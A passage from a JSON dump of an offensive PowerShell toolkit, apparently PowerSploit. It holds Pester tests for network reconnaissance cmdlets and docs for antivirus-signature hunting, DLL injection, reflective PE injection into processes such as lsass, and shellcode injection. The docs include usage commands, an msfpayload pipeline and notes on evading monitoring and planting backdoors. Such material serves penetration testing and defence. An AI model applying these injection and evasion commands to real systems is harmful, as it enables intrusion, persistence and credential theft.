    }\n    }\n    It \"Should accept IP -ComputerName argument\" {\n        if ( (Get-NetProcess -ComputerName $LocalIP | Measure-Object).count -lt 1) {\n            Throw \"Incorrect process results returned\"\n        }\n    }\n    # TODO: RemoteUserName/RemotePassword\n    It \"Should accept pipeline input\" {\n        {\"$env:computername\" | Get-NetProcess} | Should Not Throw\n    }\n}\n\n\nDescribe \"Find-InterestingFile\" {\n    #TODO: implement\n}\n\n\nDescribe \"Invoke-UserHunter\" {\n    It \"Should accept -ComputerName argument\" {\n        if ( (Invoke-UserHunter -ShowAll -ComputerName \"$env:computername\" | Measure-Object).count -lt 1) {\n            Throw \"Insuffient results returned\"\n        }\n    }\n    try {\n        It \"Should accept -ComputerFile argument\" {\n            \"$env:computername\",\"$env:computername\" | Out-File -Encoding ASCII targets.txt\n            if ( (Invoke-UserHunter -ComputerFile \".\\targets.txt\" -ShowAll | Measure-Object).count -lt 1) {\n                Throw \"Insuffient results returned\"\n            }\n        }\n    }\n    finally {\n        Remove-Item -Force \".\\targets.txt\"\n    }\n    It \"Should accept -NoPing flag\" {\n        if ( (Invoke-UserHunter -ComputerName \"$env:computername\" -UserName $env:USERNAME -NoPing | Measure-Object).count -lt 1) {\n            Throw \"Insuffient results returned\"\n        }\n    }\n    It \"Should accept -Delay and -Jitter arguments\" {\n        if ( (Invoke-UserHunter -ShowAll -Delay 5 -Jitter 0.2 -ComputerName @(\"$env:computername\", \"$env:computername\") | Measure-Object).count -lt 1) {\n            Throw \"Insuffient results returned\"\n        }\n    }\n}\n\n\nDescribe \"Invoke-StealthUserHunter\" {\n    # simple test of the splatting\n    It \"Should accept splatting for Invoke-UserHunter\" {\n        {Invoke-StealthUserHunter -ShowAll -ComputerName \"$env:computername\"} | Should Not Throw\n    }\n}\n\n\nDescribe \"Invoke-ProcessHunter\" {\n    It \"Should accept -ComputerName and -UserName arguments\" {\n        if ( (Invoke-ProcessHunter -UserName $env:USERNAME -ComputerName \"$env:computername\" | Measure-Object).count -lt 1) {\n            Throw \"Insuffient results returned\"\n        }\n    }\n    try {\n        It \"Should accept -ComputerFile argument\" {\n            \"$env:computername\",\"$env:computername\" | Out-File -Encoding ASCII targets.txt\n            if ( (Invoke-ProcessHunter -ComputerFile \".\\targets.txt\" -UserName $env:USERNAME | Measure-Object).count -lt 1) {\n                Throw \"Insuffient results returned\"\n            }\n        }\n    }\n    finally {\n        Remove-Item -Force \".\\targets.txt\"\n    }\n    It \"Should accept -ProcessName argument\" {\n        if ( (Invoke-ProcessHunter -ComputerName \"$env:computername\" -ProcessName powershell | Measure-Object).count -lt 1) {\n            Throw \"Insuffient results returned\"\n        }\n    }\n    try {\n        It \"Should accept -UserFile argument\" {\n            \"$env:USERNAME\" | Out-File -Encoding ASCII target_users.txt\n            if ( (Invoke-ProcessHunter -ComputerName \"$env:computername\" -UserFile \".\\target_users.txt\" | Measure-Object).count -lt 1) {\n                Throw \"Insuffient results returned\"\n            }\n        }\n    }\n    finally {\n        Remove-Item -Force \".\\target_users.txt\"\n    }\n    It \"Should accept -NoPing flag\" {\n        if ( (Invoke-ProcessHunter -ComputerName \"$env:computername\" -UserName $env:USERNAME -NoPing | Measure-Object).count -lt 1) {\n            Throw \"Insuffient results returned\"\n        }\n    }\n    It \"Should accept -Delay and -Jitter arguments\" {\n        if ( (Invoke-ProcessHunter -UserName $env:USERNAME -Delay 5 -Jitter 0.2 -ComputerName @(\"$env:computername\", \"$env:computername\") | Measure-Object).count -lt 1) {\n            Throw \"Insuffient results returned\"\n        }\n    }\n}\n\n\nDescribe \"Invoke-ShareFinder\" {\n    It \"Should accept -ComputerName argument\" {\n        if ( (Invoke-ShareFinder -ComputerName \"$env:computername\" | Measure-Object).count -lt 1) {\n            Throw \"Insuffient results returned\"\n        }\n    }\n    try {\n        It \"Should accept -ComputerFile argument\" {\n            \"$env:computername\",\"$env:computername\" | Out-File -Encoding ASCII targets.txt\n            if ( (Invoke-ShareFinder -ComputerFile \".\\targets.txt\" | Measure-Object).count -lt 1) {\n                Throw \"Insuffient results returned\"\n            }\n        }\n    }\n    finally {\n        Remove-Item -Force \".\\targets.txt\"\n    }\n    It \"Should accept -ExcludeStandard argument\" {\n        {Invoke-ShareFinder -ComputerName \"$env:computername\" -ExcludeStandard} | Should Not Throw\n    }\n    It \"Should accept -ExcludePrint argument\" {\n        if ( (Invoke-ShareFinder -ComputerName \"$env:computername\" -ExcludePrint | Measure-Object).count -lt 1) {\n            Throw \"Insuffient results returned\"\n        }\n    }\n    It \"Should accept -ExcludeIPC argument\" {\n        if ( (Invoke-ShareFinder -ComputerName \"$env:computername\" -ExcludeIPC | Measure-Object).count -lt 1) {\n            Throw \"Insuffient results returned\"\n        }\n    }\n    It \"Should accept -CheckShareAccess argument\" {\n        if ( (Invoke-ShareFinder -ComputerName \"$env:computername\" -CheckShareAccess | Measure-Object).count -lt 1) {\n            Throw \"Insuffient results returned\"\n        }\n    }\n    It \"Should accept -CheckAdmin argument\" {\n        if ( (Invoke-ShareFinder -ComputerName \"$env:computername\" -CheckAdmin | Measure-Object).count -lt 1) {\n            Throw \"Insuffient results returned\"\n        }\n    }\n    It \"Should accept -NoPing argument\" {\n        if ( (Invoke-ShareFinder -NoPing -ComputerName \"$env:computername\" | Measure-Object).count -lt 1) {\n            Throw \"Insuffient results returned\"\n        }\n    }\n    It \"Should accept -Delay and -Jitter arguments\" {\n        if ( (Invoke-ShareFinder -Delay 5 -Jitter 0.2 -ComputerName @(\"$env:computername\", \"$env:computername\") | Measure-Object).count -lt 1) {\n            Throw \"Insuffient results returned\"\n        }\n    }\n}\n\n\nDescribe \"Invoke-FileFinder\" {\n    It \"Should accept -ComputerName argument\" {\n        {Invoke-FileFinder -ComputerName \"$env:computername\"} | Should Not Throw\n    }\n    try {\n        It \"Should accept -ComputerFile argument\" {\n            \"$env:computername\",\"$env:computername\" | Out-File -Encoding ASCII targets.txt        \n            {Invoke-FileFinder -ComputerFile \".\\targets.txt\"} | Should Not Throw\n        }\n    }\n    finally {\n        Remove-Item -Force \".\\targets.txt\"\n    }\n    try {\n        It \"Should accept -ShareList argument\" {\n            \"\\\\$($env:computername)\\\\IPC$\" | Out-File -Encoding ASCII shares.txt\n            {Invoke-FileFinder -ShareList \".\\shares.txt\"} | Should Not Throw\n        }\n    }\n    finally {\n        Remove-Item -Force \".\\shares.txt\"\n    }\n    It \"Should accept -Terms argument\" {\n        {Invoke-FileFinder -Terms secret,testing -ComputerName \"$env:computername\"} | Should Not Throw\n    }\n    It \"Should accept -OfficeDocs argument\" {\n        {Invoke-FileFinder -OfficeDocs -ComputerName \"$env:computername\"} | Should Not Throw\n    }\n    It \"Should accept -FreshEXEs argument\" {\n        {Invoke-FileFinder -FreshEXEs -ComputerName \"$env:computername\"} | Should Not Throw\n    }\n    It \"Should accept -LastAccessTime argument\" {\n        {Invoke-FileFinder -LastAccessTime \"01/01/2000\" -ComputerName \"$env:computername\"} | Should Not Throw\n    }\n    It \"Should accept -LastWriteTime argument\" {\n        {Invoke-FileFinder -LastWriteTime \"01/01/2000\" -ComputerName \"$env:computername\"} | Should Not Throw\n    }\n    It \"Should accept -ExcludeFolders argument\" {\n        {Invoke-FileFinder -ExcludeFolders -ComputerName \"$env:computername\"} | Should Not Throw\n    }\n    It \"Should accept -ExcludeHidden argument\" {\n        {Invoke-FileFinder -ExcludeHidden -ComputerName \"$env:computername\"} | Should Not Throw\n    }\n    It \"Should accept -CreationTime argument\" {\n        {Invoke-FileFinder -CreationTime \"01/01/2000\" -ComputerName \"$env:computername\"} | Should Not Throw\n    }\n    It \"Should accept -OutFile argument\" {\n        {Invoke-FileFinder -ComputerName \"$env:computername\" -OutFile \"found_files.csv\"} | Should Not Throw\n        if(Test-Path -Path .\\found_files.csv) {\n            $Null = Remove-Item -Force .\\found_files.csv\n        }\n    }\n    It \"Should accept -NoPing argument\" {\n        {Invoke-FileFinder -NoPing -ComputerName \"$env:computername\"} | Should Not Throw\n    }\n    It \"Should accept -Delay and -Jitter arguments\" {\n        {Invoke-FileFinder -Delay 5 -Jitter 0.2 -ComputerName @(\"$env:computername\",\"$env:computername\")} | Should Not Throw\n    }\n}\n\n\nDescribe \"Find-LocalAdminAccess\" {\n    It \"Should accept -ComputerName argument\" {\n        if ( (Find-LocalAdminAccess -ComputerName \"$env:computername\" | Measure-Object).count -lt 1) {\n            Throw \"Insuffient results returned\"\n        }\n    }\n    try {\n        It \"Should accept -ComputerFile argument\" {\n            \"$env:computername\",\"$env:computername\" | Out-File -Encoding ASCII targets.txt\n            if ( (Find-LocalAdminAccess -ComputerFile \".\\targets.txt\" | Measure-Object).count -lt 1) {\n                Throw \"Insuffient results returned\"\n            }\n        }\n    }\n    finally {\n        Remove-Item -Force \".\\targets.txt\"\n    }\n    It \"Should accept -NoPing argument\" {\n        if ( (Find-LocalAdminAccess -NoPing -ComputerName \"$env:computername\" | Measure-Object).count -lt 1) {\n            Throw \"Insuffient results returned\"\n        }\n    }\n    It \"Should accept -Delay and -Jitter arguments\" {\n        if ( (Find-LocalAdminAccess -Delay 5 -Jitter 0.2 -ComputerName @(\"$env:computername\",\"$env:computername\") | Measure-Object).count -lt 1) {\n            Throw \"Insuffient results returned\"\n        }\n    }\n}\n\n\nDescribe \"Invoke-EnumerateLocalAdmin\" {\n    It \"Should accept -ComputerName argument\" {\n        if ( (Invoke-EnumerateLocalAdmin -ComputerName \"$env:computername\" | Measure-Object).count -lt 1) {\n            Throw \"Insuffient results returned\"\n        }\n    }\n    try {\n        It \"Should accept -ComputerFile argument\" {\n            \"$env:computername\",\"$env:computername\" | Out-File -Encoding ASCII targets.txt\n            if ( (Invoke-EnumerateLocalAdmin -ComputerFile \".\\targets.txt\" | Measure-Object).count -lt 1) {\n                Throw \"Insuffient results returned\"\n            }\n        }\n    }\n    finally {\n        Remove-Item -Force \".\\targets.txt\"\n    }\n    It \"Should accept -NoPing argument\" {\n        if ( (Invoke-EnumerateLocalAdmin -NoPing -ComputerName \"$env:computername\" | Measure-Object).count -lt 1) {\n            Throw \"Insuffient results returned\"\n        }\n    }\n    It \"Should accept -Delay and -Jitter arguments\" {\n        if ( (Invoke-EnumerateLocalAdmin -Delay 5 -Jitter 0.2 -ComputerName @(\"$env:computername\",\"$env:computername\") | Measure-Object).count -lt 1) {\n            Throw \"Insuffient results returned\"\n        }\n    }\n    It \"Should accept -Outfile argument\" {\n        Invoke-EnumerateLocalAdmin -ComputerName \"$env:computername\" -OutFile \"local_admins.csv\"\n        \".\\local_admins.csv\" | Should Exist\n        Remove-Item -Force .\\local_admins.csv\n    }\n}\n"
  },
  {
    "path": "docs/AntivirusBypass/Find-AVSignature.md",
    "content": "# Find-AVSignature\r\n\r\n## SYNOPSIS\r\nLocate tiny AV signatures.\r\n\r\nPowerSploit Function: Find-AVSignature  \r\nAuthors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nFind-AVSignature [-StartByte] <UInt32> [-EndByte] <String> [-Interval] <UInt32> [[-Path] <String>]\r\n [[-OutPath] <String>] [[-BufferLen] <UInt32>] [-Force]\r\n```\r\n\r\n## DESCRIPTION\r\nLocates single Byte AV signatures utilizing the same method as DSplit from \"class101\" on heapoverflow.com.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nFind-AVSignature -Startbyte 0 -Endbyte max -Interval 10000 -Path c:\\test\\exempt\\nc.exe\r\n```\r\n\r\nFind-AVSignature -StartByte 10000 -EndByte 20000 -Interval 1000 -Path C:\\test\\exempt\\nc.exe -OutPath c:\\test\\output\\run2 -Verbose\r\nFind-AVSignature -StartByte 16000 -EndByte 17000 -Interval 100 -Path C:\\test\\exempt\\nc.exe -OutPath c:\\test\\output\\run3 -Verbose\r\nFind-AVSignature -StartByte 16800 -EndByte 16900 -Interval 10 -Path C:\\test\\exempt\\nc.exe -OutPath c:\\test\\output\\run4 -Verbose\r\nFind-AVSignature -StartByte 16890 -EndByte 16900 -Interval 1 -Path C:\\test\\exempt\\nc.exe -OutPath c:\\test\\output\\run5 -Verbose\r\n\r\n## PARAMETERS\r\n\r\n### -StartByte\r\nSpecifies the first byte to begin splitting on.\r\n\r\n```yaml\r\nType: UInt32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -EndByte\r\nSpecifies the last byte to split on.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: True\r\nPosition: 2\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Interval\r\nSpecifies the interval size to split with.\r\n\r\n```yaml\r\nType: UInt32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: True\r\nPosition: 3\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Path\r\nSpecifies the path to the binary you want tested.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 4\r\nDefault value: ($pwd.path)\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -OutPath\r\nOptionally specifies the directory to write the binaries to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 5\r\nDefault value: ($pwd)\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -BufferLen\r\nSpecifies the length of the file read buffer . \r\nDefaults to 64KB.\r\n\r\n```yaml\r\nType: UInt32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 6\r\nDefault value: 65536\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Force\r\nForces the script to continue without confirmation.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\nSeveral of the versions of \"DSplit.exe\" available on the internet contain malware.\r\n\r\n## RELATED LINKS\r\n\r\n[http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html\r\nhttps://github.com/mattifestation/PowerSploit\r\nhttp://www.exploit-monday.com/\r\nhttp://heapoverflow.com/f0rums/project.php?issueid=34&filter=changes&page=2](http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html\r\nhttps://github.com/mattifestation/PowerSploit\r\nhttp://www.exploit-monday.com/\r\nhttp://heapoverflow.com/f0rums/project.php?issueid=34&filter=changes&page=2)\r\n\r\n"
  },
  {
    "path": "docs/CodeExecution/Invoke-DllInjection.md",
    "content": "# Invoke-DllInjection\r\n\r\n## SYNOPSIS\r\nInjects a Dll into the process ID of your choosing.\r\n\r\nPowerSploit Function: Invoke-DllInjection  \r\nAuthor: Matthew Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nInvoke-DllInjection [-ProcessID] <Int32> [-Dll] <String>\r\n```\r\n\r\n## DESCRIPTION\r\nInvoke-DllInjection injects a Dll into an arbitrary process.\r\nIt does this by using VirtualAllocEx to allocate memory the size of the\r\nDLL in the remote process, writing the names of the DLL to load into the\r\nremote process spacing using WriteProcessMemory, and then using RtlCreateUserThread\r\nto invoke LoadLibraryA in the context of the remote process.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nInvoke-DllInjection -ProcessID 4274 -Dll evil.dll\r\n```\r\n\r\nDescription\r\n-----------\r\nInject 'evil.dll' into process ID 4274.\r\n\r\n## PARAMETERS\r\n\r\n### -ProcessID\r\nProcess ID of the process you want to inject a Dll into.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Dll\r\nName of the dll to inject.\r\nThis can be an absolute or relative path.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: True\r\nPosition: 2\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\nUse the '-Verbose' option to print detailed information.\r\n\r\n## RELATED LINKS\r\n\r\n[http://www.exploit-monday.com](http://www.exploit-monday.com)\r\n\r\n"
  },
  {
    "path": "docs/CodeExecution/Invoke-ReflectivePEInjection.md",
    "content": "# Invoke-ReflectivePEInjection\r\n\r\n## SYNOPSIS\r\nThis script has two modes.\r\nIt can reflectively load a DLL/EXE in to the PowerShell process,\r\nor it can reflectively load a DLL in to a remote process.\r\nThese modes have different parameters and constraints,\r\nplease lead the Notes section (GENERAL NOTES) for information on how to use them.\r\n\r\n1.)Reflectively loads a DLL or EXE in to memory of the Powershell process.\r\nBecause the DLL/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process.\r\n\r\nThis tool can be run on remote servers by supplying a local Windows PE file (DLL/EXE) to load in to memory on the remote system,\r\nthis will load and execute the DLL/EXE in to memory without writing any files to disk.\r\n\r\n2.) Reflectively load a DLL in to memory of a remote process.\r\nAs mentioned above, the DLL being reflectively loaded won't be displayed when tools are used to list DLLs of the running remote process.\r\n\r\nThis is probably most useful for injecting backdoors in SYSTEM processes in Session0.\r\nCurrently, you cannot retrieve output\r\nfrom the DLL.\r\nThe script doesn't wait for the DLL to complete execution, and doesn't make any effort to cleanup memory in the\r\nremote process.\r\n\r\nPowerSploit Function: Invoke-ReflectivePEInjection  \r\nAuthor: Joe Bialek, Twitter: @JosephBialek  \r\nCode review and modifications: Matt Graeber, Twitter: @mattifestation  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nInvoke-ReflectivePEInjection [-PEBytes] <Byte[]> [[-ComputerName] <String[]>] [[-FuncReturnType] <String>]\r\n [[-ExeArgs] <String>] [[-ProcId] <Int32>] [[-ProcName] <String>] [-ForceASLR] [-DoNotZeroMZ]\r\n```\r\n\r\n## DESCRIPTION\r\nReflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nLoad DemoDLL and run the exported function WStringFunc on Target.local, print the wchar_t* returned by WStringFunc().\r\n```\r\n\r\n$PEBytes = \\[IO.File\\]::ReadAllBytes('DemoDLL.dll')\r\nInvoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName Target.local\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nLoad DemoDLL and run the exported function WStringFunc on all computers in the file targetlist.txt. Print\r\n```\r\n\r\nthe wchar_t* returned by WStringFunc() from all the computers.\r\n$PEBytes = \\[IO.File\\]::ReadAllBytes('DemoDLL.dll')\r\nInvoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName (Get-Content targetlist.txt)\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nLoad DemoEXE and run it locally.\r\n```\r\n\r\n$PEBytes = \\[IO.File\\]::ReadAllBytes('DemoEXE.exe')\r\nInvoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs \"Arg1 Arg2 Arg3 Arg4\"\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\nLoad DemoEXE and run it locally. Forces ASLR on for the EXE.\r\n```\r\n\r\n$PEBytes = \\[IO.File\\]::ReadAllBytes('DemoEXE.exe')\r\nInvoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs \"Arg1 Arg2 Arg3 Arg4\" -ForceASLR\r\n\r\n### -------------------------- EXAMPLE 5 --------------------------\r\n```\r\nRefectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer.\r\n```\r\n\r\n$PEBytes = \\[IO.File\\]::ReadAllBytes('DemoDLL_RemoteProcess.dll')\r\nInvoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Target.Local\r\n\r\n## PARAMETERS\r\n\r\n### -PEBytes\r\nA byte array containing a DLL/EXE to load and execute.\r\n\r\n```yaml\r\nType: Byte[]\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerName\r\nOptional, an array of computernames to run the script on.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 2\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -FuncReturnType\r\nOptional, the return type of the function being called in the DLL.\r\nDefault: Void\r\n    Options: String, WString, Void.\r\nSee notes for more information.\r\n    IMPORTANT: For DLLs being loaded remotely, only Void is supported.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 3\r\nDefault value: Void\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ExeArgs\r\nOptional, arguments to pass to the executable being reflectively loaded.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 4\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ProcId\r\nOptional, the process ID of the remote process to inject the DLL in to.\r\nIf not injecting in to remote process, ignore this.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 5\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ProcName\r\nOptional, the name of the remote process to inject the DLL in to.\r\nIf not injecting in to remote process, ignore this.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 6\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ForceASLR\r\nOptional, will force the use of ASLR on the PE being loaded even if the PE indicates it doesn't support ASLR.\r\nSome PE's will work with ASLR even\r\n    if the compiler flags don't indicate they support it.\r\nOther PE's will simply crash.\r\nMake sure to test this prior to using.\r\nHas no effect when\r\n    loading in to a remote process.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -DoNotZeroMZ\r\nOptional, will not wipe the MZ from the first two bytes of the PE.\r\nThis is to be used primarily for testing purposes and to enable loading the same PE with Invoke-ReflectivePEInjection more than once.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\nGENERAL NOTES:\r\nThe script has 3 basic sets of functionality:\r\n1.) Reflectively load a DLL in to the PowerShell process\r\n    -Can return DLL output to user when run remotely or locally.\r\n    -Cleans up memory in the PS process once the DLL finishes executing.\r\n    -Great for running pentest tools on remote computers without triggering process monitoring alerts.\r\n    -By default, takes 3 function names, see below (DLL LOADING NOTES) for more info.\r\n2.) Reflectively load an EXE in to the PowerShell process.\r\n    -Can NOT return EXE output to user when run remotely.\r\nIf remote output is needed, you must use a DLL.\r\nCAN return EXE output if run locally.\r\n    -Cleans up memory in the PS process once the DLL finishes executing.\r\n    -Great for running existing pentest tools which are EXE's without triggering process monitoring alerts.\r\n3.) Reflectively inject a DLL in to a remote process.\r\n    -Can NOT return DLL output to the user when run remotely OR locally.\r\n    -Does NOT clean up memory in the remote process if/when DLL finishes execution.\r\n    -Great for planting backdoor on a system by injecting backdoor DLL in to another processes memory.\r\n    -Expects the DLL to have this function: void VoidFunc().\r\nThis is the function that will be called after the DLL is loaded.\r\n\r\nDLL LOADING NOTES:\r\n\r\nPowerShell does not capture an applications output if it is output using stdout, which is how Windows console apps output.\r\nIf you need to get back the output from the PE file you are loading on remote computers, you must compile the PE file as a DLL, and have the DLL\r\nreturn a char* or wchar_t*, which PowerShell can take and read the output from.\r\nAnything output from stdout which is run using powershell\r\nremoting will not be returned to you.\r\nIf you just run the PowerShell script locally, you WILL be able to see the stdout output from\r\napplications because it will just appear in the console window.\r\nThe limitation only applies when using PowerShell remoting.\r\n\r\nFor DLL Loading:\r\nOnce this script loads the DLL, it calls a function in the DLL.\r\nThere is a section near the bottom labeled \"YOUR CODE GOES HERE\"\r\nI recommend your DLL take no parameters.\r\nI have prewritten code to handle functions which take no parameters are return\r\nthe following types: char*, wchar_t*, and void.\r\nIf the function returns char* or wchar_t* the script will output the\r\nreturned data.\r\nThe FuncReturnType parameter can be used to specify which return type to use.\r\nThe mapping is as follows:\r\nwchar_t*   : FuncReturnType = WString\r\nchar*      : FuncReturnType = String\r\nvoid       : Default, don't supply a FuncReturnType\r\n\r\nFor the whcar_t* and char_t* options to work, you must allocate the string to the heap.\r\nDon't simply convert a string\r\nusing string.c_str() because it will be allocaed on the stack and be destroyed when the DLL returns.\r\n\r\nThe function name expected in the DLL for the prewritten FuncReturnType's is as follows:\r\nWString    : WStringFunc\r\nString     : StringFunc\r\nVoid       : VoidFunc\r\n\r\nThese function names ARE case sensitive.\r\nTo create an exported DLL function for the wstring type, the function would\r\nbe declared as follows:\r\nextern \"C\" __declspec( dllexport ) wchar_t* WStringFunc()\r\n\r\n\r\nIf you want to use a DLL which returns a different data type, or which takes parameters, you will need to modify\r\nthis script to accomodate this.\r\nYou can find the code to modify in the section labeled \"YOUR CODE GOES HERE\".\r\n\r\nFind a DemoDLL at: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectiveDllInjection\r\n\r\n## RELATED LINKS\r\n\r\n[http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/\r\n\r\nBlog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/\r\nBlog on using this script as a backdoor with SQL server: http://www.casaba.com/blog/](http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/\r\n\r\nBlog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/\r\nBlog on using this script as a backdoor with SQL server: http://www.casaba.com/blog/)\r\n\r\n"
  },
  {
    "path": "docs/CodeExecution/Invoke-Shellcode.md",
    "content": "# Invoke-Shellcode\r\n\r\n## SYNOPSIS\r\nInject shellcode into the process ID of your choosing or within the context of the running PowerShell process.\r\n\r\nPowerSploit Function: Invoke-Shellcode  \r\nAuthor: Matthew Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nInvoke-Shellcode [-ProcessID <UInt16>] [-Shellcode <Byte[]>] [-Force]\r\n```\r\n\r\n## DESCRIPTION\r\nPortions of this project was based upon syringe.c v1.2 written by Spencer McIntyre\r\n\r\nPowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX.\r\nTo generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk):\r\n\r\nmsfpayload windows/exec CMD=\"cmd /k calc\" EXITFUNC=thread C | sed '1,6d;s/\\[\";\\]//g;s/\\\\\\\\/,0/g' | tr -d '\\n' | cut -c2-\r\n\r\nMake sure to specify 'thread' for your exit process.\r\nAlso, don't bother encoding your shellcode.\r\nIt's entirely unnecessary.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nInvoke-Shellcode -ProcessId 4274\r\n```\r\n\r\nDescription\r\n-----------\r\nInject shellcode into process ID 4274.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nInvoke-Shellcode\r\n```\r\n\r\nDescription\r\n-----------\r\nInject shellcode into the running instance of PowerShell.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nInvoke-Shellcode -Shellcode @(0x90,0x90,0xC3)\r\n```\r\n\r\nDescription\r\n-----------\r\nOverrides the shellcode included in the script with custom shellcode - 0x90 (NOP), 0x90 (NOP), 0xC3 (RET)\r\nWarning: This script has no way to validate that your shellcode is 32 vs.\r\n64-bit!\r\n\r\n## PARAMETERS\r\n\r\n### -ProcessID\r\nProcess ID of the process you want to inject shellcode into.\r\n\r\n```yaml\r\nType: UInt16\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Shellcode\r\nSpecifies an optional shellcode passed in as a byte array\r\n\r\n```yaml\r\nType: 